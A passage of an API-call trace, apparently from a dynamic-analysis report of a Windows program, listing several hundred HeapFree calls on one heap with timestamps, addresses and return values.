out: hHeap=0x430000) returned 1 [0120.356] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x23ee410 | out: hHeap=0x430000) returned 1 [0120.356] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2401620 | out: hHeap=0x430000) returned 1 [0120.356] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2414830 | out: hHeap=0x430000) returned 1 [0120.360] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2427a40 | out: hHeap=0x430000) returned 1 [0120.360] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x243ac50 | out: hHeap=0x430000) returned 1 [0120.360] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x244de60 | out: hHeap=0x430000) returned 1 [0120.360] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2461070 | out: hHeap=0x430000) returned 1 [0120.360] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2474280 | out: hHeap=0x430000) returned 1 [0120.360] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2487490 | out: hHeap=0x430000) returned 1 [0120.360] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x249a6a0 | out: hHeap=0x430000) returned 1 [0120.360] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x24ad8b0 | out: hHeap=0x430000) returned 1 [0120.360] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x24c0ac0 | out: hHeap=0x430000) returned 1 [0120.360] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x24d3cd0 | out: hHeap=0x430000) returned 1 [0120.360] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x24e6ee0 | out: hHeap=0x430000) returned 1 [0120.360] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x24fa0f0 | out: hHeap=0x430000) returned 1 [0120.360] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x250d300 | out: hHeap=0x430000) returned 1 [0120.360] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2520510 | out: hHeap=0x430000) returned 1 [0120.366] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2533720 | out: hHeap=0x430000) returned 1 [0120.366] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2546930 | out: hHeap=0x430000) returned 1 [0121.517] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2559b40 | out: hHeap=0x430000) returned 1 [0121.518] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x256cd50 | out: hHeap=0x430000) returned 1 [0121.518] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x257ff60 | out: hHeap=0x430000) returned 1 [0121.518] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2593170 | out: hHeap=0x430000) returned 1 [0121.518] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x25a6380 | out: hHeap=0x430000) returned 1 [0121.518] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x25b9590 | out: hHeap=0x430000) returned 1 [0121.518] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x25cc7a0 | out: hHeap=0x430000) returned 1 [0121.518] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x25df9b0 | out: hHeap=0x430000) returned 1 [0121.518] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x25f2bc0 | out: hHeap=0x430000) returned 1 [0121.518] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2610080 | out: hHeap=0x430000) returned 1 [0121.518] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2623290 | out: hHeap=0x430000) returned 1 [0121.518] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x26364a0 | out: hHeap=0x430000) returned 1 [0121.518] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x26496b0 | out: hHeap=0x430000) returned 1 [0121.519] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x265c8c0 | out: hHeap=0x430000) returned 1 [0121.519] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x266fad0 | out: hHeap=0x430000) returned 1 [0121.519] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2682ce0 | out: hHeap=0x430000) returned 1 [0121.519] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2695ef0 | out: hHeap=0x430000) returned 1 [0121.519] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x26a9100 | out: hHeap=0x430000) returned 1 [0121.519] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x26bc310 | out: hHeap=0x430000) returned 1 [0121.527] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x26cf520 | out: hHeap=0x430000) returned 1 [0121.538] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x26e2730 | out: hHeap=0x430000) returned 1 [0121.538] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x26f5940 | out: hHeap=0x430000) returned 1 [0121.538] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2708b50 | out: hHeap=0x430000) returned 1 [0121.541] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x271bd60 | out: hHeap=0x430000) returned 1 [0121.541] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x272ef70 | out: hHeap=0x430000) returned 1 [0121.541] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2742180 | out: hHeap=0x430000) returned 1 [0121.541] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2755390 | out: hHeap=0x430000) returned 1 [0121.541] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x27685a0 | out: hHeap=0x430000) returned 1 [0121.541] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x277b7b0 | out: hHeap=0x430000) returned 1 [0121.541] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x278e9c0 | out: hHeap=0x430000) returned 1 [0121.541] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x27a1bd0 | out: hHeap=0x430000) returned 1 [0121.541] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x27b4de0 | out: hHeap=0x430000) returned 1 [0121.541] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x27c7ff0 | out: hHeap=0x430000) returned 1 [0121.541] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x27db200 | out: hHeap=0x430000) returned 1 [0121.542] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x27ee410 | out: hHeap=0x430000) returned 1 [0121.542] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2801620 | out: hHeap=0x430000) returned 1 [0121.542] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2814830 | out: hHeap=0x430000) returned 1 [0121.548] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2827a40 | out: hHeap=0x430000) returned 1 [0121.549] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x283ac50 | out: hHeap=0x430000) returned 1 [0121.550] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x284de60 | out: hHeap=0x430000) returned 1 [0121.550] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2861070 | out: hHeap=0x430000) returned 1 [0121.550] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2874280 | out: hHeap=0x430000) returned 1 [0121.550] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2887490 | out: hHeap=0x430000) returned 1 [0121.550] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x289a6a0 | out: hHeap=0x430000) returned 1 [0121.550] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x28ad8b0 | out: hHeap=0x430000) returned 1 [0121.550] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x28c0ac0 | out: hHeap=0x430000) returned 1 [0121.550] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x28d3cd0 | out: hHeap=0x430000) returned 1 [0121.550] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x28e6ee0 | out: hHeap=0x430000) returned 1 [0121.550] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x28fa0f0 | out: hHeap=0x430000) returned 1 [0121.550] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x290d300 | out: hHeap=0x430000) returned 1 [0121.550] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2920510 | out: hHeap=0x430000) returned 1 [0121.555] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2933720 | out: hHeap=0x430000) returned 1 [0121.555] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2946930 | out: hHeap=0x430000) returned 1 [0121.555] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2959b40 | out: hHeap=0x430000) returned 1 [0121.555] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x296cd50 | out: hHeap=0x430000) returned 1 [0121.557] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x297ff60 | out: hHeap=0x430000) returned 1 [0121.557] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2993170 | out: hHeap=0x430000) returned 1 [0121.557] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x29a6380 | out: hHeap=0x430000) returned 1 [0121.557] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x29b9590 | out: hHeap=0x430000) returned 1 [0121.557] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x29cc7a0 | out: hHeap=0x430000) returned 1 [0121.557] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x29df9b0 | out: hHeap=0x430000) returned 1 [0121.557] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x29f2bc0 | out: hHeap=0x430000) returned 1 [0121.558] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2a05dd0 | out: hHeap=0x430000) returned 1 [0121.558] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2a18fe0 | out: hHeap=0x430000) returned 1 [0121.558] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2a2c1f0 | out: hHeap=0x430000) returned 1 [0121.861] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2a3f400 | out: hHeap=0x430000) returned 1 [0121.861] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2a52610 | out: hHeap=0x430000) returned 1 [0121.861] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2a65820 | out: hHeap=0x430000) returned 1 [0121.861] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2a78a30 | out: hHeap=0x430000) returned 1 [0121.861] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2a8bc40 | out: hHeap=0x430000) returned 1 [0121.864] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2a9ee50 | out: hHeap=0x430000) returned 1 [0121.865] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2ab2060 | out: hHeap=0x430000) returned 1 [0121.865] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2ac5270 | out: hHeap=0x430000) returned 1 [0121.865] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2ad8480 | out: hHeap=0x430000) returned 1 [0121.865] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2aeb690 | out: hHeap=0x430000) returned 1 [0121.865] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2afe8a0 | out: hHeap=0x430000) returned 1 [0121.865] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2b11ab0 | out: hHeap=0x430000) returned 1 [0121.865] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2b24cc0 | out: hHeap=0x430000) returned 1 [0121.865] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2b37ed0 | out: hHeap=0x430000) returned 1 [0121.870] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2b4b0e0 | out: hHeap=0x430000) returned 1 [0121.870] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2b5e2f0 | out: hHeap=0x430000) returned 1 [0121.870] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2b71500 | out: hHeap=0x430000) returned 1 [0121.870] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2b84710 | out: hHeap=0x430000) returned 1 [0121.870] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2b97920 | out: hHeap=0x430000) returned 1 [0121.871] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2baab30 | out: hHeap=0x430000) returned 1 [0121.873] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2bbdd40 | out: hHeap=0x430000) returned 1 [0121.875] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2bd0f50 | out: hHeap=0x430000) returned 1 [0121.875] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2be4160 | out: hHeap=0x430000) returned 1 [0121.875] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2bf7370 | out: hHeap=0x430000) returned 1 [0121.875] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c0a580 | out: hHeap=0x430000) returned 1 [0121.875] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c1d790 | out: hHeap=0x430000) returned 1 [0121.875] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c309a0 | out: hHeap=0x430000) returned 1 [0121.875] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c43bb0 | out: hHeap=0x430000) returned 1 [0121.879] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c56dc0 | out: hHeap=0x430000) returned 1 [0121.880] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c69fd0 | out: hHeap=0x430000) returned 1 [0121.880] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c7d1e0 | out: hHeap=0x430000) returned 1 [0121.880] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c903f0 | out: hHeap=0x430000) returned 1 [0121.904] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2ca3600 | out: hHeap=0x430000) returned 1 [0121.904] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2cb6810 | out: hHeap=0x430000) returned 1 [0121.907] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2cc9a20 | out: hHeap=0x430000) returned 1 [0121.908] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2cdcc30 | out: hHeap=0x430000) returned 1 [0121.908] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2cefe40 | out: hHeap=0x430000) returned 1 [0121.909] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d03050 | out: hHeap=0x430000) returned 1 [0121.909] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d16260 | out: hHeap=0x430000) returned 1 [0121.909] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d29470 | out: hHeap=0x430000) returned 1 [0121.909] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d3c680 | out: hHeap=0x430000) returned 1 [0121.909] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d4f890 | out: hHeap=0x430000) returned 1 [0121.914] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d62aa0 | out: hHeap=0x430000) returned 1 [0121.914] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d75cb0 | out: hHeap=0x430000) returned 1 [0121.914] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d88ec0 | out: hHeap=0x430000) returned 1 [0121.914] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d9c0d0 | out: hHeap=0x430000) returned 1 [0121.915] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2daf2e0 | out: hHeap=0x430000) returned 1 [0121.917] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2dc24f0 | out: hHeap=0x430000) returned 1 [0121.918] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2dd5700 | out: hHeap=0x430000) returned 1 [0121.918] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2de8910 | out: hHeap=0x430000) returned 1 [0121.919] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2e10080 | out: hHeap=0x430000) returned 1 [0121.919] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2e23290 | out: hHeap=0x430000) returned 1 [0121.919] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2e364a0 | out: hHeap=0x430000) returned 1 [0121.919] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2e496b0 | out: hHeap=0x430000) returned 1 [0121.919] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2e5c8c0 | out: hHeap=0x430000) returned 1 [0121.919] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2e6fad0 | out: hHeap=0x430000) returned 1 [0121.919] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2e82ce0 | out: hHeap=0x430000) returned 1 [0121.919] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2e95ef0 | out: hHeap=0x430000) returned 1 [0121.919] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2ea9100 | out: hHeap=0x430000) returned 1 [0122.153] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2ebc310 | out: hHeap=0x430000) returned 1 [0122.155] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2ecf520 | out: hHeap=0x430000) returned 1 [0122.155] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2ee2730 | out: hHeap=0x430000) returned 1 [0122.155] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2ef5940 | out: hHeap=0x430000) returned 1 [0122.155] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2f08b50 | out: hHeap=0x430000) returned 1 [0122.159] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2f1bd60 | out: hHeap=0x430000) returned 1 [0122.159] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2f2ef70 | out: hHeap=0x430000) returned 1 [0122.159] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2f42180 | out: hHeap=0x430000) returned 1 [0122.159] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2f55390 | out: hHeap=0x430000) returned 1 [0122.159] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2f685a0 | out: hHeap=0x430000) returned 1 [0122.159] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2f7b7b0 | out: hHeap=0x430000) returned 1 [0122.162] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2f8e9c0 | out: hHeap=0x430000) returned 1 [0122.163] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2fa1bd0 | out: hHeap=0x430000) returned 1 [0122.163] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2fb4de0 | out: hHeap=0x430000) returned 1 [0122.163] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2fc7ff0 | out: hHeap=0x430000) returned 1 [0122.163] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2fdb200 | out: hHeap=0x430000) returned 1 [0122.163] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2fee410 | out: hHeap=0x430000) returned 1 [0122.164] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3001620 | out: hHeap=0x430000) returned 1 [0122.164] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3014830 | out: hHeap=0x430000) returned 1 [0122.168] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3027a40 | out: hHeap=0x430000) returned 1 [0122.168] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x303ac50 | out: hHeap=0x430000) returned 1 [0122.169] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x304de60 | out: hHeap=0x430000) returned 1 [0122.170] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3061070 | out: hHeap=0x430000) returned 1 [0122.170] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3074280 | out: hHeap=0x430000) returned 1 [0122.170] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3087490 | out: hHeap=0x430000) returned 1 [0122.170] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x309a6a0 | out: hHeap=0x430000) returned 1 [0122.170] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x30ad8b0 | out: hHeap=0x430000) returned 1 [0122.170] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x30c0ac0 | out: hHeap=0x430000) returned 1 [0122.170] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x30d3cd0 | out: hHeap=0x430000) returned 1 [0122.170] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x30e6ee0 | out: hHeap=0x430000) returned 1 [0122.170] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x30fa0f0 | out: hHeap=0x430000) returned 1 [0122.175] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x310d300 | out: hHeap=0x430000) returned 1 [0122.178] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3120510 | out: hHeap=0x430000) returned 1 [0122.181] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3133720 | out: hHeap=0x430000) returned 1 [0122.181] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3146930 | out: hHeap=0x430000) returned 1 [0122.181] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3159b40 | out: hHeap=0x430000) returned 1 [0122.181] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x316cd50 | out: hHeap=0x430000) returned 1 [0122.181] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x317ff60 | out: hHeap=0x430000) returned 1 [0122.181] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3193170 | out: hHeap=0x430000) returned 1 [0122.182] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x31a6380 | out: hHeap=0x430000) returned 1 [0122.406] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x31b9590 | out: hHeap=0x430000) returned 1 [0122.408] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x31cc7a0 | out: hHeap=0x430000) returned 1 [0122.408] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x31df9b0 | out: hHeap=0x430000) returned 1 [0122.408] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x31f2bc0 | out: hHeap=0x430000) returned 1 [0122.408] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3205dd0 | out: hHeap=0x430000) returned 1 [0122.408] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3218fe0 | out: hHeap=0x430000) returned 1 [0122.408] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x322c1f0 | out: hHeap=0x430000) returned 1 [0122.412] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x323f400 | out: hHeap=0x430000) returned 1 [0122.412] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3252610 | out: hHeap=0x430000) returned 1 [0122.413] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3265820 | out: hHeap=0x430000) returned 1 [0122.414] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3278a30 | out: hHeap=0x430000) returned 1 [0122.414] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x328bc40 | out: hHeap=0x430000) returned 1 [0122.414] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x329ee50 | out: hHeap=0x430000) returned 1 [0122.414] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x32b2060 | out: hHeap=0x430000) returned 1 [0122.414] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x32c5270 | out: hHeap=0x430000) returned 1 [0122.414] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x32d8480 | out: hHeap=0x430000) returned 1 [0122.414] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x32eb690 | out: hHeap=0x430000) returned 1 [0122.419] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x32fe8a0 | out: hHeap=0x430000) returned 1 [0122.421] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3311ab0 | out: hHeap=0x430000) returned 1 [0122.421] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3324cc0 | out: hHeap=0x430000) returned 1 [0122.421] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3337ed0 | out: hHeap=0x430000) returned 1 [0122.425] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x334b0e0 | out: hHeap=0x430000) returned 1 [0122.425] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x335e2f0 | out: hHeap=0x430000) returned 1 [0122.425] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3371500 | out: hHeap=0x430000) returned 1 [0122.425] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3384710 | out: hHeap=0x430000) returned 1 [0122.426] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3397920 | out: hHeap=0x430000) returned 1 [0122.427] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x33aab30 | out: hHeap=0x430000) returned 1 [0122.427] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x33bdd40 | out: hHeap=0x430000) returned 1 [0122.427] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x33d0f50 | out: hHeap=0x430000) returned 1 [0122.427] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x33e4160 | out: hHeap=0x430000) returned 1 [0122.427] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x33f7370 | out: hHeap=0x430000) returned 1 [0122.428] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x340a580 | out: hHeap=0x430000) returned 1 [0122.432] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x341d790 | out: hHeap=0x430000) returned 1 [0122.434] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x34309a0 | out: hHeap=0x430000) returned 1 [0122.434] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3443bb0 | out: hHeap=0x430000) returned 1 [0122.437] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3456dc0 | out: hHeap=0x430000) returned 1 [0122.437] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3469fd0 | out: hHeap=0x430000) returned 1 [0122.437] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x347d1e0 | out: hHeap=0x430000) returned 1 [0122.437] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x34903f0 | out: hHeap=0x430000) returned 1 [0122.439] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x34a3600 | out: hHeap=0x430000) returned 1 [0122.683] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x34b6810 | out: hHeap=0x430000) returned 1 [0122.683] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x34c9a20 | out: hHeap=0x430000) returned 1 [0122.683] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x34dcc30 | out: hHeap=0x430000) returned 1 [0122.683] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x34efe40 | out: hHeap=0x430000) returned 1 [0122.684] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3503050 | out: hHeap=0x430000) returned 1 [0122.687] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3516260 | out: hHeap=0x430000) returned 1 [0122.689] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3529470 | out: hHeap=0x430000) returned 1 [0122.689] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x353c680 | out: hHeap=0x430000) returned 1 [0122.689] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x354f890 | out: hHeap=0x430000) returned 1 